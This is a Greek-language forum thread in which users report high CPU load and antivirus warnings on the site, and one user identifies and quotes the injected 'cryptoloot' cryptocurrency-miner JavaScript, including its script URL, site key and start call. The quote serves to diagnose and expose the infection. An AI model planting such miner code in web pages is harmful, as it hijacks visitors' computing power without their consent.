Συχνές ερωτήσεις Συχνές ερωτήσεις       Εγγραφή Εγγραφή   Σύνδεση Σύνδεση

Προβλήματα στο forum

Το κανάλι του ελληνικού στρατού στο Google+  Facebook  Twitter  Youtube 
 Απάντηση Απάντηση Σελ.  1 202122
Συγγραφέας
  Θέμα  Αναζήτηση Θέμα Αναζήτηση  Επιλογές θέματος Επιλογές θέματος
_KOURSAROS_ Δες τη Λίστα
Αντισυνταγματάρχης
Αντισυνταγματάρχης

Μέλος από: 04/Μαΐου/2010
Κατάσταση: Αποσυνδεδεμένος/η
  Παράθεση _KOURSAROS_ Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Θέμα: Προβλήματα στο forum
    Αποστολή: 01/Δεκεμβρίου/2017 ώρα 17:16
Εδώ και μια εβδομάδα όταν επισκέπτομαι την ιστοσελίδα ο επεξεργαστής δουλεύει στο 100% δεν ξέρω τι πρόβλημα υπάρχει, αλλά ψάξτε το λίγο.
Είς οιωνός άριστος αμύνεσθαι περί πάτρης.
Επιστροφή στην κορυφή
Terminator Δες τη Λίστα
Στρατοπεδάρχης
Στρατοπεδάρχης

Μέλος από: 11/Ιουλίου/2011
  Παράθεση Terminator Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 14/Δεκεμβρίου/2017 ώρα 15:02
Το πρόβλημα πρέπει να εχει διορθωθεί ηδη
Επιστροφή στην κορυφή
_KOURSAROS_ Δες τη Λίστα
Αντισυνταγματάρχης
Αντισυνταγματάρχης

Παράθεση _KOURSAROS_ Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 14/Δεκεμβρίου/2017 ώρα 18:15
Δυστυχώς όχι, το πρόβλημα παραμένει.

Επιστροφή στην κορυφή
D.Y.K Δες τη Λίστα
Γενικός Επιθεωρητής Στρατού

Μέλος από: 03/Φεβρουαρίου/2009
  Παράθεση D.Y.K Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 15/Δεκεμβρίου/2017 ώρα 09:54
Λυπούμαστε γι'αυτό, αλλά το συγκεκριμένο πρόβλημα δεν δύναται να λυθεί.
Επιστροφή στην κορυφή
_KOURSAROS_ Δες τη Λίστα
Αντισυνταγματάρχης
Αντισυνταγματάρχης

Παράθεση _KOURSAROS_ Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 15/Δεκεμβρίου/2017 ώρα 13:17
Αρχικά αποστάλθηκε από D.Y.K

Λυπούμαστε γι'αυτό, αλλά το συγκεκριμένο πρόβλημα δεν δύναται να λυθεί.

Γνωρίζετε την αιτία;
Επιστροφή στην κορυφή
spinalgr1990 Δες τη Λίστα
Υποδεκανέας
Υποδεκανέας

Μέλος από: 15/Ιανουαρίου/2013
  Παράθεση spinalgr1990 Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 18/Δεκεμβρίου/2017 ώρα 14:40
Δεν ξερω αν συμβαινει και σε αλλους αλλα σε εμενα όταν παω να μπω στο φορουμ μου φορτωνει ο επεξεργαστης στο τερμα και σημερα μου εβγαλε και ειδοποιηση το adblock ότι η σελιδα είναι μολυσμενη με crypto-currency-miner.

Επιστροφή στην κορυφή
JohnTehGreek Δες τη Λίστα
Λοχαγός
Λοχαγός

Μέλος από: 05/Δεκεμβρίου/2015
  Παράθεση JohnTehGreek Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 18/Δεκεμβρίου/2017 ώρα 17:50
Χωρίς να θέλω να φανώ κακός προς τους υπεύθυνους του Site νομίζω ότι οι ίδιοι το βάλανε για να βγάλουν κανά φράγκο.

Μπορεί βέβαια να είναι απλά κάποιο πρόβλημα με την σελίδα, πάντως ο επεξεργαστής μου όποτε μπαίνω χτυπάει 100% Usage άρα ότι κάνει Mining είναι σίγουρο.
Επιστροφή στην κορυφή
Nassos Δες τη Λίστα

Μέλος από: 12/Νοεμβρίου/2005
  Παράθεση Nassos Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 18/Δεκεμβρίου/2017 ώρα 18:40
Όχι δεν βάλαμε για να κάνουμε mining και λοιπές ψηφιακές βλακείες.

Να ανφέρω ότι και εμένα με κτυπάει το antivirus και αναγκάζομαι να κάνω μερική απενεργοποίηση για να μπω στη σελίδα. Όπως και ότι ο CPU δουλεύει turbo με το που κάνω login, όχι βέβαια όταν ανοίγω άλλες βαριές εφαρμογές (WebGL).
Επιστροφή στην κορυφή
Πολιτης Δες τη Λίστα
Πολίτης
Πολίτης
  Παράθεση Πολιτης Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 22/Δεκεμβρίου/2017 ώρα 13:57
Ο miner ονομαζεται cryptoloot και ειναι αυτο:http://cryptoloot.pro/lib/crlt.js

Πιο συγκεκριμενα τρεχει το ακολουθο τμημα κωδικα js:
< ="//cryptoloot.pro/lib/crlt.js">
var miner = new CRLT.Anonymous ('20ac2ece8590f03c69a16ce6f69039a38d48ea205150') ;
if (miner.isMobile ()) {
miner.setThrottle (0.3) ;
}
miner.start () ;

Πρωτη φορα επισκεφτηκα το site οποτε ισως δεν εχω μεριδιο αλλα πιστευω θα ηταν καλο να γινει πρωτη προτεραιότητα να φτιαχτει αυτο το προβλημα καθως καποιοι αυτη τη στιγμη βγαζουν λεφτα απο τη δυστυχια αλλων...

ΥΓ: Χρηστες κατεβαστε καποιο plugin που απενεργοποιει τη javascript (πχ.Quick Javascript Switcher) αν θελετε να διαβασετε καποιο θεμα που σας αφορα στο παρον site.
Επιστροφή στην κορυφή
spinalgr1990 Δες τη Λίστα
Υποδεκανέας
Υποδεκανέας

Μέλος από: 15/Ιανουαρίου/2013
  Παράθεση spinalgr1990 Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 30/Δεκεμβρίου/2017 ώρα 09:43
Μολις μπηκα στην σελίδα με chrome 63 και με firefox quantum 57 δεν τρεχει το cryptoloot και ο επεξεργαστης τρεχει σε normal χρηση. Αντίθετα με το microsoft edge που δοκίμασα ο επεξεργαστης δουλεύει turbo.
Επιστροφή στην κορυφή
pame_pali Δες τη Λίστα
Ταγματάρχης
Ταγματάρχης

Μέλος από: 28/Σεπτεμβρίου/2014
  Παράθεση pame_pali Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 01/Ιανουαρίου/2018 ώρα 15:21
Εμενα παλι που προσπαθω να μπω από το λάπτοπ και δε μπορώ να μπω διότι μου ανοίγει κατευθείαν το αντιβαιρους και λέει επικίνδυνο ιστότοπος και μου κάνει κατευθείαν σάρωση.
Επιστροφή στην κορυφή
Παγουράς Δες τη Λίστα
Πολίτης
Πολίτης
  Παράθεση Παγουράς Παράθεση  ΑπάντησηΑπάντηση ’μεσος Σύνδεσμος Σε Αυτό Το Μήνυμα Αποστολή: 12/Ιανουαρίου/2018 ώρα 12:01
Καλησπέρα, ενώ έχει γίνει η εγγραφή μου κανονικά, μόλις κάνω σύνδεση και μου αναγράφει συνδεθήκατε Με επιτυχία, μόλις φορτώνει η σελίδα φαίνομαι πάλι εκτός σύνδεσης, δεν έχω συνδεθεί ούτε μία φορά
Επιστροφή στην κορυφή
 Απάντηση Απάντηση Σελ.  1 202122
Τα Greeklish απαγορεύονται και τα μηνύματα διαγράφονται αμέσως και χωρίς προειδοποίηση (βλέπε Σωστά ελληνικά ή διαγραφή)

Γρήγορη Απάντηση
Όνομα:

Μήνυμα:
Κωδικός Ασφαλείας:
Code Image - Please contact webmaster if you have problems seeing this image code Φόρτωση νέου Κώδικα
Παρακαλώ εισάγετε τον Κωδικό Ασφαλείας που φαίνεται παραπάνω σαν γραφικό.
Θα πρέπει να ενεργοποιήσετε τα Cookies στον browser.